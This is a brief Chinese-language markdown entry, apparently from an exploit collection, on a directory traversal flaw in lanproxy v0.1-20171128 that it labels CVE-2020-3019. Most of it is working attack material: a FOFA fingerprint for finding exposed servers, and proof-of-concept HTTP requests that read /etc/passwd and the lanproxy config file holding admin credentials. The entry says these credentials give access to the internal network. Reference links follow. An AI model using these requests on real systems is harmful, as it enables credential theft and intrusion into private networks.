lanproxy 目录遍历漏洞(CVE-2020-3019).md
643 B / 2021-05-21 09:14:38
# lanproxy 目录遍历漏洞(CVE-2020-3019)
lanproxy是一个内网穿透工具,lanproxy v0.1-20171128版本存在目录遍历漏洞,可直接读取配置文件获取账号密码登录lanproxy后台,从而可以直接进入内网。
FOFA:
```
"Server: LPS-0.1"
```
PoC:
```bash
GET /../../../../../../../../../../../../../../etc/passwd HTTP/1.1
lanproxy配置文件:
GET /../conf/config.properties HTTP/1.1
```
ref:
* https://github.com/maybe-why-not/lanproxy/issues/1
* https://help.aliyun.com/noticelist/articleid/1060779015.html
* https://github.com/ffay/lanproxy
* https://forum.ywhack.com/thread-114939-1-1.html